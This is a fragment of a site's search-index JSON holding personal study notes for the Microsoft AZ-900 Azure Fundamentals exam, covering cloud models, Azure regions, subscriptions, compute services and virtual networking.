                            • Udemy course: AZ-900 Bootcamp: Microsoft Azure Fundamentals.
                            • Udemy course: AZ-900 Microsoft Azure Fundamentals Practice Tests, Sep 2023
                            • Linkedin course: Exam tips: Microsoft Azure Fundamentals (AZ-900)
                            Labs and resources
                            • All labs.
                            • Deploy a file share in Microsoft Azure
                            • Deploy a virtual network in Microsoft Azure
                            • [Provision a resource group in Azure](https://labitpro.com/provision-a-resource-group-in-azure/
                            • Deploy and configure an Azure Virtual Machine
                            • Deploy and configure an Azure Storage Account
                            • Deploy and configure a network security group
                            • [Deploy and configure Azure Bastion](https://labitpro.com/deploy-and-configure-azure-bastion/
                            • Add a Custom Domain to Azure AD
                            • Create Users and Groups in Azure AD
                            • Configure Self-Service Password Reset in Azure AD
                            • Create and Configure an Azure Storage Account
                            • Manage Azure Storage Account Access Keys
                            • Create an Azure File Share
                            • Create and Attach a VM Data Disk
                            • Resize an Azure Virtual Machine
                            • Create a VM Scale Set in Azure
                            • Configure vNet Peering
                            • Create and Configure an Azure Recovery Services Vault
                            • Managing Users and Groups in Azure AD
                            • Practice with a mock exam.
                            • AZ-900 crossword puzzle
                            • Flashcards
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#basic-cloud-computing-concepts","title":"Basic Cloud Computing concepts","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#shared-responsability-model","title":"Shared responsability model","text":"

                            Very often, IaaS, PaaS and SaaS are referred as Cloud computing stack because esencially they are built on top one from another.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#cloud-models","title":"Cloud models","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#public-cloud","title":"Public cloud","text":"

                            In a public cloud deployment, services are offered over the public internet. These services are available to customers who wish to purchase them. The cloud resources, like servers and storage, are owned and operated by the cloud service provider.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#private-cloud","title":"Private cloud","text":"

                            In a private cloud, compute resources are accessed exclusively by users from a single business or organization. You can host a private cloud physically in your own on-prem datacenter, or it can be hosted by a third-party cloud service provider.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#hybrid-cloud","title":"Hybrid cloud","text":"

                            A hybrid cloud is a complex computing environment. It combines a public cloud and a private cloud by allowing data and applications to be shared between them. This type of cloud deployment is often utilized by large organizations.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#consumption-based-model","title":"Consumption-Based Model","text":"

                            The consumption-based model refers to the way in which organizations only pay for the resources they use. The consumption-based model offers the following benefits:

                            • No upfront costs
                            • No need to purchase or manage infrastructure
                            • Customer pays for resources only when they are needed
                            • Customer can stop paying for resources that are no longer needed
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#benefits-of-cloud-computing","title":"Benefits of Cloud Computing","text":"

                            Cloud computing offers several key advantages over a physical environment:

                            • High availability: Cloud-based apps can provide a continuous user experience with virtually no downtime.
                            • Scalability: Apps in the cloud can scale vertically and horizontally. When scaling vertically, compute capacity is added by adding RAM or CPUs to a virtual machine. When scaling horizontally, compute capacity is increased by adding instances of resources, such as adding VMs to a configuration.
                            • Elasticity: Allows you to configure apps to autoscale so they always have the resources they need.
                            • Agility: Deploy and configure cloud-based resources quickly as requirements change.
                            • Geo-distribution: Deploy apps to regional datacenters so that customers always have the best performance in their specific region.
                            • Disaster recovery: Cloud-based backup services, data replication, and geo-distribution allow you to deploy apps and know that their data is safe in the event of disaster.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#capital-expenses-vs-operating-expenses","title":"Capital Expenses vs. Operating Expenses","text":"

                            Organizations have to think about two different types of expenses:

                            • Capital Expenditure (CapEx): The spending of money up-front on physical infrastructure. These expenses are deducted over time.
                            • Operational Expenditure (OpEx): The spending of money on services or products now and being billed for them now. These expenses are deducted in the same year they are incurred. Most cloud services are considered OpEx.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#the-cloud-computing-stack","title":"The Cloud Computing stack","text":"

                            Before delving deeper, I would like to share this highly informative chart depicting Azure services and their position within the cloud computing stack.

                            After this, let's start with the stack!

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#infrastructure-as-a-service-iaas","title":"Infrastructure-as-a-Service (IaaS)","text":"

                            Migrating to IaaS helps reduce the need for maintenance of on-prem data centers and allows organizations to save money on hardware costs. IaaS solutions allow organizations to scale their IT resources up and down with demand, while also allowing them to quickly provision new applications and increase the reliability of their underlying infrastructure.

                            1. One common business scenario and use case for IaaS is Lift-and-Shift Migration:

                            - migrate app and workloads to the cloud\n- Increase scale and perfomance\n- Enhance security\n- Reduce the cost without refactoring the application\n

                            2. Another common use case is Storage, backup, and recovery:

                            - Avoid capital outlay for storage and complexity of storage management\n- IaaS is useful for handling unpredictable demand and steadily growing storage needs\n- Simplify planning/management of backup/recovery\n

                            3. Web apps IaaS provides all the infrastructure needed to support web apps: storage, web and application servers, networking resources. Quickly deployable, easily scale infrastructure up and down.

                            4. High-performance computer

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#platform-as-a-service-paas","title":"Platform-as-a-Service (PaaS)","text":"

                            Basically, PaaS is a complete development and deployment environment in the cloud. Includes: servers, storage, networking, middleware, development tools, BI services, database management systems, and more. PaaS supports the complete web application lifecycle. Yo manage the applications and services and the service provider manages everything else.

                            Platform-as-a-Service is a complete development and deployment environment in the cloud. It can be used to deploy simple cloud-based apps and complex cloud-enabled enterprise applications. When leveraging PaaS, you purchase the resources you need from your cloud service provider on a pay-as-yougo basis. The resource you purchase are accessed over a secure Internet connection.

                            PaaS resources include the same resources included in IaaS (servers, storage, and networking) PLUS things like middleware, development tools, business intelligence services, and database management systems.

                            It\u2019s important to remember that PaaS is designed to support the complete web application lifecycle. It allows organizations to avoid the expense buying and managing software licenses, underlying infrastructure and middleware, container orchestrators, and development tools.

                            Ultimately, when leveraging PaaS offerings, you manage the applications and services, while the cloud service provider manages everything else.

                            1. One common business scenario and use case for PaaS is Development framework. A framework that developers can use to develop or customize cloud based applications and that Azure provides.

                            2. Analytics and BI: tools provided as a service with PaaS.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#software-as-a-service-saas","title":"Software-as-a-Service (SaaS)","text":"

                            Software-as-a-Service allows users to connect to cloud-based apps over the Internet. Microsoft Office 365 is a good example of SaaS in action. Gmail would be another good example. SaaS provides a complete software solution that\u2019s purchased on a pay-as-you-go basis from a cloud service provider. It\u2019s essentially the rental of an app, that users can then connect to over the Internet, via a web browser. The underlying infrastructure, middleware, app software, and app data for a SaaS solution are all hosted in the provider\u2019s data center, which means the service provider is responsible for managing the hardware and software. SaaS allows organizations to get up and running quickly, with minimal upfront cost.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#architectural-components","title":"Architectural components","text":"

                            The core architectural components of Azure may be broken down into two main groupings: the physical infrastructure, and the management infrastructure.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#physical-infrastructure","title":"Physical infrastructure","text":"

                            The physical infrastructure for Azure starts with datacenters. Conceptually, the datacenters are the same as large corporate datacenters. They\u2019re facilities with resources arranged in racks, with dedicated power, cooling, and networking infrastructure. \u00a0Individual datacenters aren\u2019t directly accessible. Datacenters are grouped into Azure Regions or Azure Availability Zones

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-region","title":"Azure Region","text":"

                            A region is a geographical area that contains at least one (but potentially multiple) datacenters that are networked together with a low-latency network.

                            Every Azure region is paired with another region within the same geography (ie. US, Europe, or Asia) at least 300 miles away in order to allow replication of resources across that geography. Replicating resources across region pairs helps reduce interruptions due to events like natural disasters, civil unrest, power outages, or physical network outages that affect both regions at once.

                            Some services or features are only available in certain regions. Others don't require to select an specific region. For instance: Azure Active Directory, Azure Traffic Manager, or Azure DNS.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#availability-zones","title":"Availability zones","text":"

                            Availability zones are physically separate datacenters within an Azure region. Each availability zone is made up of one or more datacenters equipped with independent power, cooling, and networking.

                            Availability zones are physically separate datacenters within an Azure region. Every availability zone includes one or more datacenters that features independent power, cooling, and networking. In essence, an availability zone is designed to be an isolation boundary, meaning if one zone goes down, the other continues working.

                            Availability zones are designed primarily for VMs, managed disks, load balancers, and SQL databases. It is important to remember that availability zones are connected through private high-speed fiber-optic networks. The image below shows what availability zones look like within a region:

                            To ensure resiliency, a minimum of three separate availability zones are present in all availability zone-enabled regions. However, not all Azure Regions currently support availability zones.

                            Azure services that support availability zones fall into three categories:

                            • Zonal services: You pin the resource to a specific zone (for example, VMs, managed disks, IP addresses).
                            • Zone-redundant services: The platform replicates automatically across zones (for example, zone-redundant storage, SQL Database).
                            • Non-regional services: Services are always available from Azure geographies and are resilient to zone-wide outages as well as region-wide outages.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#region-pairs","title":"Region pairs","text":"

                            Each Azure region is paired with another region within the same geography at least 300 miles away. This is done to allow for the replication of resources across a geography and reduce the chance of unavailability. West US region is, for instance, paired with East US.

                            If an outage occurs: one region is prioritized to make sure that at least one is restored as quickly as possible. It also does so to minimize downtime. Data continues to reside within the same geography as its pair (except for Brazil South) for tax -and law- enforcement jurisdiction purposes.

                            Most regions are paired in two directions, meaning they are the backup for the region that provides a backup for them (West US and East US back each other up). However, some regions, such as West India and Brazil South, are paired in only one direction. In a one-direction pairing, the Primary region does not provide backup for its secondary region. So, even though West India\u2019s secondary region is South India, South India does not rely on West India. West India's secondary region is South India, but South India's secondary region is Central India. Brazil South is unique because it's paired with a region outside of its geography. Brazil South's secondary region is South Central US. The secondary region of South Central US isn't Brazil South.

                            Sovereign regions

                            In addition to regular regions, Azure also has sovereign regions. Sovereign regions are instances of Azure that are isolated from the main instance of Azure. You may need to use a sovereign region for compliance or legal purposes. Azure sovereign regions include: - US DoD Central, US Gov Virginia, US Gov Iowa and more: These regions are physical and logical network-isolated instances of Azure for U.S. government agencies and partners. These datacenters are operated by screened U.S. personnel and include additional compliance certifications. - China East, China North, and more: These regions are available through a unique partnership between Microsoft and 21Vianet, whereby Microsoft doesn't directly maintain the datacenters.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#management-infrastructure","title":"Management infrastructure","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-resources-and-resource-groups","title":"Azure Resources and Resource Groups","text":"

                            A resource is the basic building block of Azure. Anything you create, provision, deploy, etc. is a resource. Virtual Machines (VMs), virtual networks, databases, cognitive services, etc. are all considered resources within Azure.

                            Resource groups are simply groupings of resources. When you create a resource, you\u2019re required to place it into a resource group. While a resource group can contain many resources, a single resource can only be in one resource group at a time. Some resources may be moved between resource groups, but when you move a resource to a new group, it will no longer be associated with the former group. Additionally, resource groups can't be nested, meaning you can\u2019t put resource group B inside of resource group A.

                            If you grant or deny access to a resource group, you\u2019ve granted or denied access to all the resources within the resource group. When deleting a resource group, all resources included in it will be deleted, so it makes sense to organized your resource groups by similar lifecycle, or by function.

                            A resource group can be used to scope access control for administrative actions. To manage a resource group, you can assign\u00a0Azure Policies,\u00a0Azure roles, or\u00a0resource locks.

                            You can\u00a0apply tags\u00a0to a resource group. The resources in the resource group don't inherit those tags.

                            You can deploy up to 800 instances of a resource type in each resource group. Some resource types are\u00a0exempt from the 800 instance limit. For more information, see\u00a0resource group limits.

                            When you create a resource group, you need to provide a location for that resource group. You may be wondering, \"Why does a resource group need a location? And, if the resources can have different locations than the resource group, why does the resource group location matter at all?\". The resource group stores metadata about the resources. When you specify a location for the resource group, you're specifying where that metadata is stored. For compliance reasons, you may need to ensure that your data is stored in a particular region. If a resource group's region is temporarily unavailable, you can't update resources in the resource group because the metadata is unavailable.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-subscription","title":"Azure Subscription","text":"

                            An Azure subscription provides authenticated and authorized access to Azure products and services and allows organizations to provision cloud resources. Every Azure subscription links to an Azure account.

                            In Azure, subscriptions are a unit of management, billing, and scale.

                            An account can have multiple subscriptions, but it\u2019s only required to have one. In a multi-subscription account, you can use the subscriptions to configure different billing models and apply different access-management policies.

                            You can use Azure subscriptions to define boundaries around Azure products, services, and resources. There are two types of subscription boundaries that you can use:

                            • Billing boundary: This subscription type determines how an Azure account is billed for using Azure. You can create multiple subscriptions for different types of billing requirements. Azure generates separate billing reports and invoices for each subscription so that you can organize and manage costs.
                            • Access control boundary: Azure applies access-management policies at the subscription level, and you can create separate subscriptions to reflect different organizational structures. An example is that within a business, you have different departments to which you apply distinct Azure subscription policies. This billing model allows you to manage and control access to the resources that users provision with specific subscriptions.

                            Use cases for creating additional subscriptions:

                            • To separate Environments: separate environments for development and testing, security, or to isolate data for compliance reasons. This design is particularly useful because resource access control occurs at the subscription level.
                            • To separate Organizational structures: you could limit one team to lower-cost resources, while allowing the IT department a full range. This design allows you to manage and control access to the resources that users provision within each subscription.
                            • To separate Billing: For instance, you might want to create one subscription for your production workloads and another subscription for your development and testing workloads.

                            After you've created an Azure account, you're free to create additional subscriptions. After you've created an Azure suscription, you can start creating Azure resources within each subscription.

                            You can have up to 2000 role assignments in each subscription.

                            Each Azure Subscription can not trust multiple Active Directories. An Azure subscription has a trust relationship with Azure Active Directory (Azure AD). A subscription trusts Azure AD to authenticate users, services, and devices. Multiple subscriptions can trust the same Azure AD directory. Each subscription can only trust a single directory.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#management-groups-in-azure","title":"Management Groups in Azure","text":"

                            To efficiently manage access, policies (like available regions), and compliance when you manage multiple Azure subscriptions, you can use Management Groups, because management groups provide scope that sits above subscriptions.

                            When managing multiple subscriptions, you organize those subscriptions into containers called management groups, to which you can then apply governance conditions. All subscriptions within a management group will, in turn, inherit the conditions you apply to the management group.

                            All subscriptions within a single management group must trust the same Azure AD tenant.

                            The image below highlights how you can create a hierarchy for governance through the use of management groups:

                            Some examples of how you could use management groups might be:

                            • Create a hierarchy that applies a policy.
                            • Provide user access to multiple subscriptions.

                            Facts we need to know:

                            • Maximum of 10,000 management groups supported in a single directory.
                            • A management group tree can support up to six levels of depth (root and subscription level not included)
                            • Each management group and subscription can support only one parent.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#tags","title":"Tags","text":"

                            One way to organize related resources is to place them in their own subscriptions. You can also use resource groups to manage related resources. Resource tags are another way to organize resources. Tags provide extra information, or metadata, about your resources. A resource tag consists of a name and a value. You can assign one or more tags to each Azure resource. Keep in mind that you don't need to enforce that a specific tag is present on all of your resources.

                            Name Value AppName The name of the application that the resource is part of. CostCenter The internal cost center code. Owner The name of the business owner who's responsible for the resource. Environment An environment name, such as \"Prod,\" \"Dev,\" or \"Test.\" Impact How important the resource is to business operations, such as \"Mission-critical,\" \"High-impact,\" or \"Low-impact.\"

                            How do I manage resource tags?

                            You can add, modify, or delete resource tags through Windows PowerShell, the Azure CLI, Azure Resource Manager templates, the REST API, or the Azure portal.

                            You can also use Azure Policy to enforce tagging rules and conventions.

                            Resources don't inherit tags from subscriptions and resource groups, meaning that you can apply tags at one level and not have those tags automatically show up at a different level, allowing you to create custom tagging schemas that change depending on the level (resource, resource group, subscription, and so on).

                            Limitations to tags:

                            • Not all resource types support tags.
                            • Maximum of 50 tags (for Resource Groups and Resources).
                              • Tag name length: 512 characters.
                              • Tag value length: 256 characters.
                            • Maximum of 15 tags for storage accounts.
                              • Tag name length: 128 characters.
                              • Tag value length: 256 characters. VM and VM scale sets: total set of 2048 character
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-compute-services-and-products","title":"Azure Compute services and products","text":"

                            Azure compute is an on-demand computing service that organizations use to run cloud-based applications. It provides compute resources like disks, processors, memory, networking, and even operating systems. Azure supports many types of compute solutions, including Linux, Windows Server, SQL Server, Oracle, IBM, and SAP. Each Azure compute service offers different options depending on your requirements. The most common Azure compute services are:

                            1. Azure Virtual Machines

                              • VM Scale Sets
                              • VM Availability Sets
                            2. Azure Virtual Desktop

                            3. Azure Container Instances

                            4. Azure Functions (serverless computing)

                            5. Azure Logic Apps (serverless computing)

                            6. Azure App Service

                            7. Azure Virtual Networking

                            8. Azure Virtual Private Networks

                            9. Azure ExpressRoute

                            10. Azure DNS

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#1-azure-virtual-machines","title":"1. Azure Virtual Machines","text":"

                            Virtual machines are virtual versions of physical computers that feature virtual processors, memory, storage, and networking resources. They host an operating system just like a physical computer, and you can install and run software on them just like a physical computer.

                            VM provides IaaS and can be used in two ways:

                            • When you need total control over an operating system /environment, VMs are ideal when using in-house or customized software.

                            SLA for Virtual Machines

                            • For all Virtual Machines that have two or more instances deployed across two or more Availability Zones in the same Azure region, we guarantee you will have Virtual Machine Connectivity to at least one instance at least 99.99% of the time.

                            • For all Virtual Machines that have two or more instances deployed in the same Availability Set or in the same Dedicated Host Group, we guarantee you will have Virtual Machine Connectivity to at least one instance at least 99.95% of the time.

                            • For any Single Instance Virtual Machine using Premium SSD or Ultra Disk for all Operating System Disks and Data Disks, we guarantee you will have Virtual Machine Connectivity of at least 99.9%.

                            • For any Single Instance Virtual Machine using Standard SSD Managed Disks for Operating System Disk and Data Disks, we guarantee you will have Virtual Machine Connectivity of at least 99.5%.

                            • For any Single Instance Virtual Machine using Standard HDD Managed Disks for Operating System Disks and Data Disks, we guarantee you will have Virtual Machine Connectivity of at least 95%.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#virtual-machine-scale-sets","title":"Virtual Machine Scale Sets","text":"

                            Azure can also manage the grouping of VMs for you with features such as scale sets and availability sets. A virtual machine scale set allows you to deploy and manage a set of identical VMs that you can use to deploy solutions with true autoscale. As demand increases, VM instances can be added.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#virtual-machine-availability-sets","title":"Virtual machine availability sets","text":"

                            Virtual machine availability sets are another tool to \u00a0ensure that VMs stagger updates and have varied power and network connectivity, preventing you from losing all your VMs with a single network or power failure.

                            Availability sets do this by grouping VMs in two ways: update domain and fault domain.

                            • Update domain: The update domain groups VMs that can be rebooted at the same time.
                            • Fault domain: The fault domain groups your VMs by common power source and network switch. By default, an availability set will split your VMs across up to three fault domains. This helps protect against a physical power or networking failure by having VMs in different fault domains.

                            There\u2019s no additional cost for configuring an availability set. You only pay for the VM instances you create.

                            When to use VMs: During testing and development, When running applications in the cloud, When extending your datacenter to the cloud, During disaster recovery.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#2-azure-virtual-desktop","title":"2. Azure Virtual Desktop","text":"

                            Azure Virtual Desktop is a desktop and application virtualization service that runs on the cloud. It enables you to use a cloud-hosted version of Windows from any location. Azure Virtual Desktop provides centralized security management for users' desktops with Azure Active Directory (Azure AD). You can enable multifactor authentication to secure user sign-ins. You can also secure access to data by assigning granular role-based access controls (RBACs) to users. With Azure Virtual Desktop, the data and apps are separated from the local hardware. The actual desktop and apps are running in the cloud, meaning the risk of confidential data being left on a personal device is reduced. Azure Virtual Desktop lets you use Windows 10 or Windows 11 Enterprise multi-session, the only Windows client-based operating system that enables multiple concurrent users on a single VM.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#3-azure-container-instances","title":"3. Azure Container Instances","text":"

                            Much like running multiple virtual machines on a single physical host, you can run multiple containers on a single physical or virtual host. Virtual machines appear to be an instance of an operating system that you can connect to and manage.

                            VM vs Containers

                            VM virtualizes the hardware emulating a computer. Containers virtualizes the Operating System. Unlike virtual machines, you don't manage the operating system for a container. Containers are a virtualization environment. If you need complete control, you use VM. On the other hands, Container priorizes portability and performance.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-container-instances-aci","title":"Azure Container Instances (ACI)","text":"

                            Azure Container Instances offer the fastest and simplest way to run a container in Azure; without having to manage any virtual machines or adopt any additional services. Azure Container Instances are a platform as a service (PaaS) offering. Azure Container Instances allow you to upload your containers and then the service will run the containers for you.

                            Azure Container Instances ACI versus Azure Kubernetes service AKS

                            For many organizations, containers have become the preferred way to package, deploy, and manage cloud apps.

                            • Azure Container Instances (ACI) is the easiest way to run a container in Azure, without the need for any VMs or other infrastructure. You can use docker images.
                            • However, if you require full container orchestration, Microsoft recommends Azure Kubernetes Service (AKS).
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-container-apps","title":"Azure Container Apps","text":"

                            Azure Container Apps are similar in many ways to a container instance. They allow you to get up and running right away, they remove the container management piece, and they're a PaaS offering. Container Apps have extra benefits such as the ability to incorporate load balancing and scaling. These other functions allow you to be more elastic in your design.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-kubernetes-service-aks","title":"Azure Kubernetes Service (AKS)","text":"

                            Azure Kubernetes Service (AKS) is a container orchestration service. An orchestration service manages the lifecycle of containers. When you're deploying a fleet of containers, AKS can make fleet management simpler and more efficient.

                            AKS simplifies the deployment of a managed Kubernetes cluster in Azure by offloading the operational overhead to Azure. Since it\u2019s hosted, Azure handles the health monitoring and maintenance. The Kubernetes masters are managed by Azure, and you manage and maintain the agent nodes.

                            It\u2019s important to note that AKS itself is free. You pay only for the agent nodes within your clusters, not for the masters.

                            You can deploy an AKS cluster using Azure CLI, Azure Portal, Azure Powershell, and Template-driven deployment options (ARM templates, bicep, terraform).

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#4-azure-functions-serverless-computing","title":"4. Azure Functions (serverless computing)","text":"

                            Functions are a serverless technology that are best used in cases where you're concerned only about the code running your service and not the underlying platform or infrastructure.

                            Azure Functions is an event-driven, serverless compute option that doesn\u2019t require maintaining virtual machines or containers. If you build an app using VMs or containers, those resources have to be \u201crunning\u201d in order for your app to function. With Azure Functions, an event wakes the function, alleviating the need to keep resources provisioned when there are no events.

                            Benefits: - No infraestructure management: as a business you don't have to focus on administrative tasks. - Scalability. - You only pay for what you use. Price based on consumption: number of executions + runnign time for each.

                            Functions are commonly used when you need to perform work in response to an event (often via a REST request), timer, or message from another Azure service. Azure Functions runs your code when it's triggered and automatically deallocates resources when the function is finished. In this model, you're only charged for the CPU time used while your function runs. Functions can be either stateless or stateful. When they're stateless (the default), they behave as if they're restarted every time they respond to an event. When they're stateful (called Durable Functions), a context is passed through the function to track prior activity.

                            Generally, Azure Functions is stateless. BUT you can use an extension called Durable Functions to chain together functions and maintain their state while the functions are executing.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#5-azure-logic-apps-serverless-computing","title":"5. Azure Logic Apps (serverless computing)","text":"

                            When you need something more complex than Functions, like a workflow or a process, Azure Logic Apps is a good solution. It enables you to create no-code and low-code solutions hosted in Azure to automate and orchestrate tasks, business processes, and workflows.

                            Implementation can be done using a web-based design environment. You build the app by connecting triggers to actions with various connections.

                            Price based on consumption: number of executions + type of connections that the app uses.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#6-azure-app-service","title":"6. Azure App Service","text":"

                            App Service is a compute platform that you can use to quickly build, deploy, and scale enterprise grade web apps, background jobs, mobile back-ends, and RESTful APIs in the programming language of your choice (it supports multiple languages, including .NET, .NET Core, Java, Ruby, Node.js, PHP, or Python) without managing infrastructure (it also supports both Windows and Linux environments).

                            App service is a PaaS offering. It offers automatic scaling and high availability. It enables automated deployments from GitHub, Azure DevOps, or any Git repo to support a continuous deployment model.

                            App Service handles most of the infrastructure decisions you deal with in hosting web-accessible apps:

                            • Deployment and management are integrated into the platform.
                            • Endpoints can be secured.
                            • Sites can be scaled quickly to handle high traffic loads.
                            • The built-in load balancing and traffic manager provide high availability.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#web-apps","title":"Web apps","text":"

                            App Service includes full support for hosting web apps by using ASP.NET, ASP.NET Core, Java, Ruby, Node.js, PHP, or Python. You can choose either Windows or Linux as the host operating system.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#api-apps-azure-rest-api","title":"API apps (Azure Rest API)","text":"

                            Much like hosting a website, you can build REST-based web APIs by using your choice of language and framework. You get full Swagger support and the ability to package and publish your API in Azure Marketplace. The produced apps can be consumed from any HTTP- or HTTPS-based client.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#webjobs","title":"WebJobs","text":"

                            You can use the WebJobs feature to run a program (.exe, Java, PHP, Python, or Node.js) or script (.cmd, .bat, PowerShell, or Bash) in the same context as a web app, API app, or mobile app. They can be scheduled or run by a trigger. WebJobs are often used to run background tasks as part of your application logic.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#mobile-apps","title":"Mobile apps","text":"

                            Use the Mobile Apps feature of App Service to quickly build a back end for iOS and Android apps. With just a few actions in the Azure portal, you can store mobile app data in a cloud-based SQL database; authenticate customers against common social providers, such as MSA, Google, Twitter, and Facebook; send push notifications; execute custom back-end logic in C# or Node.js.

                            On the mobile app side, there's SDK support for native iOS and Android, Xamarin, and React native apps.

                            • Access, manage, monitor Azure accounts and resources.
                            • Monitor the health and status of Azure resources, check for alerts, diagnose and fix issues.
                            • Stop, start, restart a web app or virtual machine.
                            • Run the Azure CLI or Azure PowerShell commands to manage Azure resources.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-advisor","title":"Azure Advisor","text":"

                            Free service for tracking Azure consumption and getting offers recommendations not only for cost savings but also for performance, reliability, and security,

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#arm-templates","title":"ARM templates","text":"

                            ARM templates allow you to declaratively describe the resources you want to use, using JSON format. The template will then create those resources in parallel. For example, need 25 VMs, all 25 VMs will be created at the same time.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#7-azure-virtual-networking","title":"7. Azure Virtual Networking","text":"

                            Azure virtual networks and virtual subnets enable Azure resources, such as VMs, web apps, and databases, to communicate with each other, with users on the internet, and with your on-premises client computers.

                            Azure virtual networking supports both public and private endpoints to enable communication between external or internal resources with other internal resources.

                            • Public endpoints have a public IP address and can be accessed from anywhere in the world.
                            • Private endpoints exist within a virtual network and have a private IP address from within the address space of that virtual network.

                            It provides the following key networking capabilities:

                            Isolation and segmentation: Azure virtual network allows you to create multiple isolated virtual networks. For name resolution, you can use the name resolution service that's built into Azure. You also can configure the virtual network to use either an internal or an external DNS server.

                            Internet communications: You can enable incoming connections from the internet by assigning a public IP address to an Azure resource, or putting the resource behind a public load balancer.

                            Communicate between Azure resources: Enable Azure resources to communicate securely with each other. Virtual networks can connect not only VMs but other Azure resources. Service endpoints can connect to other Azure resource types.

                            Communicate with on-premises resources: Azure virtual networks enable you to link resources together in your on-premises environment and within your Azure subscription. - Point-to-site virtual private network connections are from a computer outside your organization back into your corporate network. In this case, the client computer initiates an encrypted VPN connection to connect to the Azure virtual network. - Site-to-site virtual private networks link your on-premises VPN device or gateway to the Azure VPN gateway in a virtual network. In effect, the devices in Azure can appear as being on the local network. The connection is encrypted and works over the internet. - Azure ExpressRoute provides a dedicated private connectivity to Azure that doesn't travel over the internet. ExpressRoute is useful for environments where you need greater bandwidth and even higher levels of security.

                            Route network traffic: By default, Azure routes traffic between subnets on any connected virtual networks, on-premises networks, and the internet. Route tables allow you to define rules about how traffic should be directed. Border Gateway Protocol (BGP) works with Azure VPN gateways, Azure Route Server, or Azure ExpressRoute to propagate on-premises BGP routes to Azure virtual networks.

                            Filter network traffic: filter traffic between subnets. - Network security groups are Azure resources that can contain multiple inbound and outbound security rules. You can define these rules to allow or block traffic, based on factors such as source and destination IP address, port, and protocol. - Network virtual appliances are specialized VMs that can be compared to a hardened network appliance. A network virtual appliance carries out a particular network function, such as running a firewall or performing wide area network (WAN) optimization.

                            Connect virtual networks: You can link virtual networks together by using virtual network peering. Peering allows two virtual networks to connect directly to each other. Network traffic between peered networks is private, and travels on the Microsoft backbone network, never entering the public internet. Peering enables resources in each virtual network to communicate with each other. These virtual networks can be in separate regions, which allows you to create a global interconnected network through Azure.

                            User-defined routes (UDR) allow you to control the routing tables between subnets within a virtual network or between virtual networks. This allows for greater control over network traffic flow.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#8-azure-virtual-private-networks","title":"8. Azure Virtual Private Networks","text":"

                            A virtual private network (VPN) uses an encrypted tunnel within another network. VPNs are typically deployed to connect two or more trusted private networks to one another over an untrusted network (typically the public internet). Traffic is encrypted while traveling over the untrusted network to prevent eavesdropping or other attacks. VPNs can enable networks to safely and securely share sensitive information.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-vpn-gateway-instances","title":"Azure VPN Gateway instances","text":"

